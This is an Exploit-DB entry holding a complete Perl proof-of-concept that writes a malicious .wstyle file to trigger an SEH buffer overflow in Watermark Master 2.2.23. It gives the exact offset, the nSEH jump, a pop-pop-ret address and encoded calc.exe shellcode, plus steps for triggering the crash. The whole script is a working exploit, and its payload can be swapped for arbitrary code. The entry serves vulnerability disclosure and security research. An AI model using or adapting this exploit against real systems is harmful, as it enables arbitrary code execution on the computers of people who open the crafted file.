Watermark Master 2.2.23 - '.wstyle' Local Buffer Overflow (SEH)

EDB-ID:

29594




Platform:

Windows

Date:

2013-11-14


#!/usr/bin/perl

#########################################################################################
# Exploit Title: Watermark Master v2.2.23 .wstyle Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: Watermark Master v2.2.23
# Software Link: http://www.videocharge.com/download/WatermarkMaster_Install.exe
# Version: 2.2.23
# Tested On: Windows XP SP3
#########################################################################################
# Timeline:
# - Oct 28: Vuln discovered, vendor alerted and acknowledged receipt of bug submission
# - Oct 29: Requested fix timeline from vendor for public disclosure
# - Nov 1:  Similar exploit publicaly released for same version of software
#   -- http://www.exploit-db.com/exploits/29327/ 
# - Nov 3:  No response from vendor, follow-up email sent
# - Nov 14: No response from vendor, public disclosure
#########################################################################################
# Creates a malicious Style file (.wstyle)
# 
# To exploit:
# 1) Place sploit.wstyle file in Video Styles folder 
# 		..\Videocharge Software\Watermark Master\Styles\Video
# 2) Launch Watermark Master application, add an image and apply the style
#		WaterMark --> Add --> Image (can also add text, rectangle, etc)
#		WaterMark --> Apply Style... --> sploit
# 3) Save (Ctrl+s) -- Application will crash, launching the exploit
#########################################################################################

my $buffsize = 15000; # sets buffer size for consistent sized payload

my $xmlstart = '<?xml version="1.0" encoding="Windows-1251" ?> <cols name="'; # build the start of the xml file

# nseh is at offset 512, followed by 9484 bytes of available data
my $junk = "\x41" x (512 - $xmlstart);
my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes)
my $seh = pack('V',0x72D11F39); # overwrite seh w/ pop edi pop esi ret
				# ASLR: False, Rebase: False, SafeSEH: False, OS: True
				# (C:\WINDOWS\system32\msacm32.drv) (no suitable app modules found)
my $nops = "\x90" x 20; 

# Alpha-numeric encoding used for xml-based Calc.exe payload
# msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | 
# msfencode -e x86/alpha_upper -b '\x00\xac\xff\xca'
# size 469

my $shell = "\x89\xe6\xd9\xeb\xd9\x76\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
"\x58\x4d\x59\x35\x50\x33\x30\x45\x50\x35\x30\x4c\x49\x4b" .
"\x55\x46\x51\x48\x52\x42\x44\x4c\x4b\x50\x52\x36\x50\x4c" .
"\x4b\x30\x52\x54\x4c\x4c\x4b\x46\x32\x42\x34\x4c\x4b\x34" .
"\x32\x57\x58\x44\x4f\x58\x37\x50\x4a\x56\x46\x36\x51\x4b" .
"\x4f\x50\x31\x59\x50\x4e\x4c\x37\x4c\x53\x51\x53\x4c\x44" .
"\x42\x46\x4c\x37\x50\x49\x51\x58\x4f\x44\x4d\x33\x31\x58" .
"\x47\x4a\x42\x5a\x50\x31\x42\x30\x57\x4c\x4b\x50\x52\x54" .
"\x50\x4c\x4b\x57\x32\x47\x4c\x55\x51\x38\x50\x4c\x4b\x31" .
"\x50\x34\x38\x4b\x35\x4f\x30\x43\x44\x51\x5a\x45\x51\x38" .
"\x50\x36\x30\x4c\x4b\x30\x48\x34\x58\x4c\x4b\x36\x38\x51" .
"\x30\x33\x31\x59\x43\x4b\x53\x57\x4c\x51\x59\x4c\x4b\x46" .
"\x54\x4c\x4b\x45\x51\x39\x46\x46\x51\x4b\x4f\x50\x31\x59" .
"\x50\x4e\x4c\x4f\x31\x48\x4f\x34\x4d\x55\x51\x58\x47\x56" .
"\x58\x4d\x30\x33\x45\x4c\x34\x54\x43\x53\x4d\x5a\x58\x47" .
"\x4b\x33\x4d\x31\x34\x33\x45\x4b\x52\x46\x38\x4c\x4b\x31" .
"\x48\x31\x34\x35\x51\x4e\x33\x55\x36\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x56\x38\x35\x4c\x43\x31\x59\x43\x4c\x4b\x45" .
"\x54\x4c\x4b\x35\x51\x58\x50\x4c\x49\x31\x54\x57\x54\x37" .
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x51\x4a\x36\x31\x4b" .
"\x4f\x4d\x30\x30\x58\x31\x4f\x50\x5a\x4c\x4b\x35\x42\x5a" .
"\x4b\x4c\x46\x31\x4d\x53\x5a\x45\x51\x4c\x4d\x4d\x55\x4e" .
"\x59\x33\x30\x45\x50\x53\x30\x50\x50\x32\x48\x56\x51\x4c" .
"\x4b\x52\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x4b\x4e\x54" .
"\x4e\x57\x42\x5a\x4a\x33\x58\x4f\x56\x4d\x45\x4f\x4d\x4d" .
"\x4d\x4b\x4f\x38\x55\x57\x4c\x54\x46\x53\x4c\x34\x4a\x4b" .
"\x30\x4b\x4b\x4b\x50\x52\x55\x34\x45\x4f\x4b\x57\x37\x32" .
"\x33\x33\x42\x52\x4f\x52\x4a\x43\x30\x51\x43\x4b\x4f\x39" .
"\x45\x45\x33\x35\x31\x42\x4c\x33\x53\x46\x4e\x32\x45\x34" .
"\x38\x53\x55\x53\x30\x41\x41";

my $xmlend = '" clsid="blah"> </cols>'; # build the rest of the xml file 

my $sploit = $junk.$nseh.$seh.$nops.$shell; # build sploit portion of buffer
my $fill = "\x43" x ($buffsize - (length($xmlstart)+length($sploit)+length($xmlend))); # fill remainder of buffer with junk for consistent size
my $buffer = $xmlstart.$sploit.$fill.$xmlend; # build final buffer

# write the exploit buffer to file
my $file = "sploit.wstyle";
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($buffer) . "\n";